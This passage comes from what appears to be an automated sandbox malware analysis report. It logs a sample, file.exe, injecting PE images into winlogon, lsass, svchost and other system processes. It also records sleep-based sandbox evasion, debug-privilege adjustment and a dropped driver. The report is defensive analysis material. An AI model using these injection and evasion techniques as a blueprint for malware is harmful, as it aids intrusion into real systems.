                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,FindCloseChangeNotification,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,FindCloseChangeNotification,CloseHandle,
                        Source: C:\Users\user\Desktop\file.exe TID: 7020Thread sleep time: -40000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6608Thread sleep count: 9616 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2832Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2632Thread sleep count: 9159 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7100Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\winlogon.exe TID: 7104Thread sleep count: 104 > 30
                        Source: C:\Windows\System32\winlogon.exe TID: 7104Thread sleep time: -104000s >= -30000s
                        Source: C:\Windows\System32\lsass.exe TID: 6736Thread sleep count: 49 > 30
                        Source: C:\Windows\System32\lsass.exe TID: 6736Thread sleep time: -49000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 5644Thread sleep count: 98 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 5644Thread sleep time: -98000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 2832Thread sleep count: 90 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 2832Thread sleep time: -90000s >= -30000s
                        Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5988Thread sleep count: 2655 > 30
                        Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 5988Thread sleep count: 1313 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 5952Thread sleep count: 81 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 5952Thread sleep time: -81000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 1812Thread sleep count: 80 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 1812Thread sleep time: -80000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 320Thread sleep count: 79 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 320Thread sleep time: -79000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 4636Thread sleep count: 76 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 4636Thread sleep time: -76000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7036Thread sleep count: 74 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7036Thread sleep time: -74000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 2608Thread sleep count: 53 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 2608Thread sleep time: -53000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 5624Thread sleep count: 65 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 5624Thread sleep time: -65000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7164Thread sleep count: 69 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7164Thread sleep time: -69000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe TID: 4612Thread sleep time: -40000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 4688Thread sleep count: 67 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 4688Thread sleep time: -67000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 4536Thread sleep count: 69 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 4536Thread sleep time: -69000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 920Thread sleep count: 66 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 920Thread sleep time: -66000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 3680Thread sleep count: 65 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 3680Thread sleep time: -65000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7136Thread sleep count: 64 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7136Thread sleep time: -64000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7072Thread sleep count: 60 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7072Thread sleep time: -60000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1764Thread sleep count: 8670 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 4272Thread sleep count: 60 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 4272Thread sleep time: -60000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 3612Thread sleep count: 61 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 3612Thread sleep time: -61000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 3660Thread sleep count: 57 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 3660Thread sleep time: -57000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 1004Thread sleep count: 58 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 1004Thread sleep time: -58000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 780Thread sleep count: 57 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 780Thread sleep time: -57000s >= -30000s
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
                        Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
                        Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                        Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
                        Source: C:\Windows\System32\wbem\WMIADAP.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9616
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9159
                        Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 2655
                        Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1313
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8670
                        Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFC9D021785 sldt word ptr [eax-0362DA78h]
                        Source: C:\Windows\System32\lsass.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                        Source: C:\Windows\System32\winlogon.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                        Source: C:\Windows\System32\winlogon.exeAPI coverage: 8.0 %
                        Source: C:\Windows\System32\lsass.exeAPI coverage: 6.0 %
                        Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BBBE3C FindFirstFileExW,
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5C1BE3C FindFirstFileExW,
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C03BE3C FindFirstFileExW,
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end node
                        Source: powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                        Source: powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                        Source: powershell.exe, 0000000C.00000002.544110092.000002BB34D88000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BB7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\System32\dialer.exeCode function: 11_2_00007FF7D2FD14E4 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,K32EnumProcesses,OpenProcess,K32EnumProcessModules,ReadProcessMemory,FindCloseChangeNotification,GetProcessHeap,RtlDeleteBoundaryDescriptor,GetProcessHeap,RtlReleasePrivilege,
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BB7E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BC3218 SetUnhandledExceptionFilter,
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BB81D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5BBB50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5C17E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5C23218 SetUnhandledExceptionFilter,
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5C181D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Windows\System32\winlogon.exeCode function: 14_2_00000268A5C1B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C03B50C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C0381D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C043218 SetUnhandledExceptionFilter,
                        Source: C:\Windows\System32\lsass.exeCode function: 15_2_000001F89C037E70 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp target: C:\Windows\System32\dialer.exe protection: readonly
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeSection loaded: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp target: unknown protection: readonly
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeSection loaded: C:\Users\user\AppData\Local\Temp\bjmgommvilsr.tmp target: unknown protection: readonly
                        Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\System32\dialer.exe base: 7C8454C010
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 268A5A50000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 1F89C000000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2028AB40000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 205B9510000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1CCF0290000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BC8AF50000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DEBD3B0000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2735A070000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FDE5D40000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 254513D0000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13982AF0000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28075470000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16B11FA0000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24A0DA40000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13954070000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 198375C0000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E4DB990000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 11AECDD0000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe base: 1EC16F80000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F0108C0000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A03E6A0000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B66F1C0000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BAA95D0000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DAC1150000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7923A0000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADC2340000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24D249A0000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B2C0FB0000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: AD0000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EEC8960000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 256EDBD0000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA7ED70000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 175B4780000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17CD1620000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13F17A90000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 181E95B0000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF53B20000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1755C590000
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC61270000
                        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1B102A80000
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeMemory written: C:\Windows\System32\dialer.exe base: C6F3C01010
                        Source: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exeMemory written: C:\Windows\System32\dialer.exe base: F2C8AF3010
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 268A5A50000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 1F89C000000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2028AB40000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 205B9510000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1CCF0290000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BC8AF50000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DEBD3B0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2735A070000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FDE5D40000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 254513D0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13982AF0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28075470000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 16B11FA0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24A0DA40000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13954070000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 198375C0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E4DB990000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 11AECDD0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe base: 1EC16F80000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F0108C0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A03E6A0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B66F1C0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BAA95D0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DAC1150000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2A7923A0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1ADC2340000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24D249A0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B2C0FB0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: AD0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1EEC8960000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 256EDBD0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FA7ED70000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 175B4780000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 17CD1620000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 13F17A90000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 181E95B0000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2BF53B20000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1755C590000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FC61270000 protect: page execute and read and write
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 268A5A50000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 1F89C000000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2028AB40000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 205B9510000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1CCF0290000 value starts with: 4D5A
                        Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BC8AF50000 value starts with: 4D5A
